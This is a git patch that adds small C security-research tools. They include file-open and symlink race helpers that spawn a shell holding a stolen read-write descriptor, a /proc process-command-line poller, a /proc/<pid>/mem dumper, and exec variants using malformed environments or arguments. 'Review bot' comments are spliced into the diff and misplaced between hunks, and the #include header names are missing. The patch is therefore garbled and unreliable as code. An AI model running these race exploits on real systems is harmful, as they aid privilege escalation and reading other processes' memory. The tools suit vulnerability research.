From 4646ef78ef5c9180d4c476924ddc6c0bd9dbc6e0 Mon Sep 17 00:00:00 2001
From: Jann Horn
Date: Sun, 24 Nov 2013 03:01:00 +0100
Subject: [PATCH] put the files in a real repo
---
tools/delayedreaddir.c | 24 +++++++++++++++
tools/evilenvexec.c | 26 +++++++++++++++++
tools/file_symlink_toggle.c | 16 ++++++++++
tools/intdiff.c | 14 +++++++++
tools/racyopen.c | 33 +++++++++++++++++++++
tools/racyopen_simple.c | 24 +++++++++++++++
tools/spawnhunter.c | 58 +++++++++++++++++++++++++++++++++++++
tools/viewmem.c | 48 ++++++++++++++++++++++++++++++
tools/weirdargs.c | 15 ++++++++++
9 files changed, 258 insertions(+)
create mode 100644 tools/delayedreaddir.c
create mode 100644 tools/evilenvexec.c
create mode 100644 tools/file_symlink_toggle.c
create mode 100644 tools/intdiff.c
create mode 100644 tools/racyopen.c
create mode 100644 tools/racyopen_simple.c
create mode 100644 tools/spawnhunter.c
create mode 100644 tools/viewmem.c
create mode 100644 tools/weirdargs.c
diff --git a/tools/delayedreaddir.c b/tools/delayedreaddir.c
new file mode 100644
index 0000000..cd7a736
--- /dev/null
+++ b/tools/delayedreaddir.c
@@ -0,0 +1,24 @@
+#include
+#include
+#include
+#include
+#include
+
+int main(int argc, char *argv[]) {
+ if (argc != 2) {
+ puts("invocation: ./delayedreaddir ");
+ return 1;
+ }
+ DIR *d = opendir(argv[1]);
+ if (d == NULL) {
+ printf("error: can't open %s - %s\n", argv[1], strerror(errno));
+ return 1;
+ }
+ printf("please press the any key...\n");
+ while (getchar() != '\n');
+ struct dirent *dent;
+ while ((dent = readdir(d)) != NULL) {
+ printf("%s ", dent->d_name);
+ }
+ printf("\n");
+}
diff --git a/tools/evilenvexec.c b/tools/evilenvexec.c
new file mode 100644
index 0000000..aab4599
--- /dev/null
+++ b/tools/evilenvexec.c
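Review bot: The key-wait loop `while (getchar() != '\n');` spins forever once stdin reaches EOF, because getchar() then keeps returning EOF and never '\n'; the same loop appears in tools/viewmem.c. In both files change it to `int c; while ((c = getchar()) != '\n' && c != EOF);`. The DIR handle is never released either; a `closedir(d);` before main returns makes the teardown explicit. The header names in the `#include` lines are missing in this rendering, so the includes could not be checked against the functions used.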
@@ -0,0 +1,26 @@
+#include
+#include
+#include
+#include
+
+extern char **environ;
+
+int main2() {
+ printf("trying to read the first char of the environment...\n");
+ puts(*environ);
+ printf("char read: %c\n", **environ);
+ return 0;
+}
+
+int main1() {
+ char *newenv[] = {(char *)0xffffffff80008000, NULL};
+ char *argv[] = { "evilenvexec", "stage2", NULL };
+ execve("/proc/self/exe", argv, newenv);
+ printf("execve fail: %s\n", strerror(errno));
+ return 1;
+}
+
+int main(int argc, char *argv[]) {
+ if (argc == 2) return main2();
+ return main1();
+}
diff --git a/tools/file_symlink_toggle.c b/tools/file_symlink_toggle.c
new file mode 100644
index 0000000..7c61bc3
--- /dev/null
+++ b/tools/file_symlink_toggle.c
@@ -0,0 +1,16 @@
+#include
+
+int main(int argc, char *argv[]) {
+ if (argc != 4) return 1;
+
+ char *filename = argv[1];
+ char *filename_ = argv[2];
+ char *linktarget = argv[3];
+
+ while (1) {
+ link(filename_, filename);
+ unlink(filename);
+ symlink(linktarget, filename);
+ unlink(filename);
+ }
+}
diff --git a/tools/intdiff.c b/tools/intdiff.c
new file mode 100644
index 0000000..87f9b71
--- /dev/null
+++ b/tools/intdiff.c
@@ -0,0 +1,14 @@
+#include
+
+int main(void) {
+ int n, n_;
+ scanf("%d", &n);
+ while (1) {
+ n_ = n;
+ if (scanf("%d", &n) != 1) {
+ perror("read failed");
+ return 1;
+ }
+ printf("%d\n", n-n_);
+ }
+}
diff --git a/tools/racyopen.c b/tools/racyopen.c
new file mode 100644
index 0000000..acb8d76
--- /dev/null
+++ b/tools/racyopen.c
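Review bot: main2() dereferences `*environ` and `**environ` without checking that the environment has a first entry, so an empty environment (environ[0] == NULL) passes NULL to puts() and then reads through it. Add `if (environ == NULL || *environ == NULL) { puts("environment is empty"); return 0; }` before the puts call. main1() and main2() are also declared with empty parentheses and external linkage; `static int main1(void)` / `static int main2(void)` is the C99 form and keeps them out of the global namespace.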
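Review bot: All four calls inside the loop discard their return values, so a mistyped argument (for example a `filename_` that does not exist) is never reported and the program just spins; report the first persistent failure once with `strerror(errno)` rather than ignoring it. The `argc != 4` branch returns 1 without saying what the three arguments are; a one-line usage message on stderr would match the other tools in this commit. The program has no exit path other than a signal, which deserves a header comment such as `/* loops until killed */`.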
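Review bot: The first `scanf("%d", &n);` is unchecked, so on empty or non-numeric input `n_ = n` copies an uninitialized int, which is undefined behavior; guard it with `if (scanf("%d", &n) != 1) return 1;`. Inside the loop a plain end of input also lands in the `perror("read failed")` branch, which prints a stale errno as an error; test `feof(stdin)` there and return 0 for normal EOF. `n-n_` overflows for inputs near INT_MIN or INT_MAX, which is undefined for signed int; computing the difference in `long long` and printing it with `%lld` avoids that.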
@@ -0,0 +1,33 @@
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+int main(int argc, char *argv[]) {
+ if (argc != 3) { puts("invocation: ./racyopen "); exit(1); }
+
+ chdir(argv[1]);
+ DIR *dir = opendir(".");
+ int prefixlen = strlen(argv[2]);
+ while (1) {
+ struct dirent *dent;
+ while ((dent = readdir(dir)) != NULL) {
+ if (dent->d_name[0] == '.' && (dent->d_name[1] == '\0' || (dent->d_name[1] == '.' && dent->d_name[2] == '\0'))) continue;
+ if (strncmp(dent->d_name, argv[2], prefixlen) == 0) {
+ int fd = open(dent->d_name, O_RDWR);
+ if (fd == -1) {
+ printf("Saw a file (%s), but couldn't open it: %s\n", dent->d_name, strerror(errno));
+ continue;
+ }
+ printf("Success! Here's your shell with open fd.\n");
+ system("/bin/sh");
+ printf("\nshell exited, resuming race\n");
+ }
+ }
+ rewinddir(dir);
+ }
+}
diff --git a/tools/racyopen_simple.c b/tools/racyopen_simple.c
new file mode 100644
index 0000000..e4d5c06
--- /dev/null
+++ b/tools/racyopen_simple.c
@@ -0,0 +1,24 @@
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+int main(int argc, char *argv[]) {
+ if (argc != 3) { puts("invocation: ./racyopen "); exit(1); }
+
+ chdir(argv[1]);
+ while (1) {
+ int fd = open(argv[2], O_RDWR);
+ if (fd == -1) {
+ sched_yield();
+ continue;
+ }
+ printf("Success! Here's your shell with open fd.\n");
+ execl("/system/bin/sh", "sh", NULL);
+ printf("\nshell exited, resuming race\n");
+ }
+}
diff --git a/tools/spawnhunter.c b/tools/spawnhunter.c
new file mode 100644
index 0000000..6a1d059
--- /dev/null
+++ b/tools/spawnhunter.c
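Review bot: `chdir(argv[1])` and `opendir(".")` are both unchecked, so a bad directory argument leaves `dir` NULL and the first `readdir(dir)` dereferences it. Replace the two lines with `if (chdir(argv[1]) != 0 || (dir = opendir(".")) == NULL) { perror(argv[1]); return 1; }` (declaring `DIR *dir;` first). `prefixlen` stores the `size_t` from strlen() in an `int`, which -Wconversion flags; `size_t prefixlen = strlen(argv[2]);` matches the strncmp() parameter type.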
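Review bot: The `printf("\nshell exited, resuming race\n")` after `execl()` is misleading: execl() returns only on failure, so that line runs when the shell could not be started, not after it exited, and the loop then goes on as if nothing happened. Report the failure instead: `fprintf(stderr, "execl failed: %s\n", strerror(errno)); return 1;`. As in tools/racyopen.c, `chdir(argv[1])` is unchecked, so a wrong directory silently opens a path relative to the current directory.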
@@ -0,0 +1,58 @@
+// Try to print the cmdlines of all process spawns by polling /proc.
+
+#include
+#include
+#include
+#include
+#include
+#include
+
+
+static unsigned int active[65536];
+
+// assumes that *str can't be empty
+static int str_to_int(char *str) {
+ unsigned int res = 0;
+ while (1) {
+ if (*str < '0' || *str > '9') return -1;
+ res += *str - '0';
+ str++;
+ if (*str == '\0') return res;
+ res *= 10;
+ }
+}
+
+int main(int argc, char *argv[]) {
+ for (int i=0; i<65536; i++) {
+ active[i] = 0;
+ }
+
+ chdir("/proc");
+ DIR *dir = opendir(".");
+ unsigned int cycle = 2, lastcycle;
+ while (1) {
+ lastcycle = cycle-1;
+ struct dirent *dent;
+ char path[5+1+7+1];
+ while ((dent = readdir(dir)) != NULL) {
+ int name_id = str_to_int(dent->d_name);
+ if (name_id < 0 || name_id > 65535) continue;
+ if (active[name_id] != lastcycle) {
+ sprintf(path, "%s/cmdline", dent->d_name);
+ int fd = open(path, O_RDONLY);
+ if (fd != -1) {
+ char cmdline[65536];
+ int cmdline_len = read(fd, cmdline, 65536);
+ if (cmdline_len != -1) {
+ write(1, cmdline, cmdline_len);
+ write(1, "\n", 1);
+ }
+ close(fd);
+ }
+ }
+ active[name_id] = cycle;
+ }
+ rewinddir(dir);
+ cycle++;
+ }
+}
diff --git a/tools/viewmem.c b/tools/viewmem.c
new file mode 100644
index 0000000..ab00ef3
--- /dev/null
+++ b/tools/viewmem.c
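Review bot: `sprintf(path, "%s/cmdline", dent->d_name)` copies the raw entry name into the 14-byte `path`, but the preceding range check bounds the parsed value, not the name length: a name with leading zeros, or one long enough for `res` to wrap, passes `name_id <= 65535` and still overflows the buffer. Format the already-validated integer instead, `snprintf(path, sizeof path, "%d/cmdline", name_id);`. `str_to_int` accumulates into an `unsigned int` and returns it as `int`, so values above INT_MAX convert in an implementation-defined way; returning -1 as soon as `res > 65535` keeps the result in range and makes the caller's upper check redundant. The `active[]` table also silently ignores PIDs above 65535, which is below the pid_max many 64-bit systems use, and that limit deserves a comment. `read()` returns ssize_t but is stored in an `int`, and both `write()` results are ignored.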
@@ -0,0 +1,48 @@
+#define _GNU_SOURCE
+
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+int main(int argc, char *argv[]) {
+ if (argc != 3) {
+ fputs("invocation: ./viewmem /proc//mem \n", stderr);
+ return 1;
+ }
+ char *end;
+ errno = 0;
+ unsigned long long addr = strtoull(argv[2], &end, 0);
+ if (errno != 0 || *end != 0) {
+ fputs("invalid addr\n", stderr);
+ return 1;
+ }
+ int fd = open(argv[1], O_RDWR);
+ if (fd == -1) {
+ fprintf(stderr, "error: can't open %s - %s\n", argv[1], strerror(errno));
+ return 1;
+ }
+ fprintf(stderr, "please press the any key...\n");
+ fd = openat(fd, "", 0, O_RDWR);
+ while (getchar() != '\n');
+ fprintf(stderr, "trying to dump...");
+ errno = 0;
+ lseek(fd, addr, SEEK_SET);
+ if (errno != 0) {
+ fprintf(stderr, "lseek() failed: %s\n", strerror(errno));
+ return 1;
+ }
+ char buf[4096]; // nothing interesting has a different pagesize anyway
+ int i=0;
+ while (read(fd, buf, 4096) == 4096) {
+ write(1, buf, 4096);
+ i++;
+ }
+ fprintf(stderr, "read %i pages\n", i);
+ return 0;
+}
diff --git a/tools/weirdargs.c b/tools/weirdargs.c
new file mode 100644
index 0000000..e9cad62
--- /dev/null
+++ b/tools/weirdargs.c
@@ -0,0 +1,15 @@
+/*
+ * Execute a program with weird args (e.g. an argv[0] value that doesn't match
+ * the filename or argc=0).
+ */
+
+#include
+#include
+#include
+#include
+
+int main(int argc, char *argv[]) {
+ execvp(argv[1], argv+2);
+ fprintf(stderr, "error: %s\n", strerror(errno));
+ return 1;
+}
\ No newline at end of file
--
2.20.1
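Review bot: `fd = openat(fd, "", 0, O_RDWR);` overwrites the descriptor that was just opened and checked with a result that is never checked; with an empty pathname and no AT_EMPTY_PATH in the flags the call is expected to fail (and `O_RDWR` sits in the mode position, which only matters with O_CREAT), so the later lseek() runs on -1 and the error surfaces as EBADF. Check the openat() result before using it, and keep or close the original descriptor explicitly instead of overwriting it. `lseek()` is checked through errno only; test its return value, `if (lseek(fd, addr, SEEK_SET) == (off_t)-1)`, which is the documented contract, and note that `addr` is narrowed from unsigned long long to off_t, so an address with the top bit set becomes a negative offset. The read loop also drops a final short read, so the printed page count understates what was readable.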
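Review bot: `execvp(argv[1], argv+2)` runs with no check on argc: invoked without arguments, `argv[1]` is the terminating NULL, so execvp() receives a NULL filename and `argv+2` points past the end of the argv array. Add `if (argc < 2) { fputs("usage: ./weirdargs prog [args...]\n", stderr); return 1; }` at the top of main. The header comment mentions the argc=0 case; one more line saying that this is what happens when only the program is given, because `argv+2` is then the NULL terminator, would make the intent explicit.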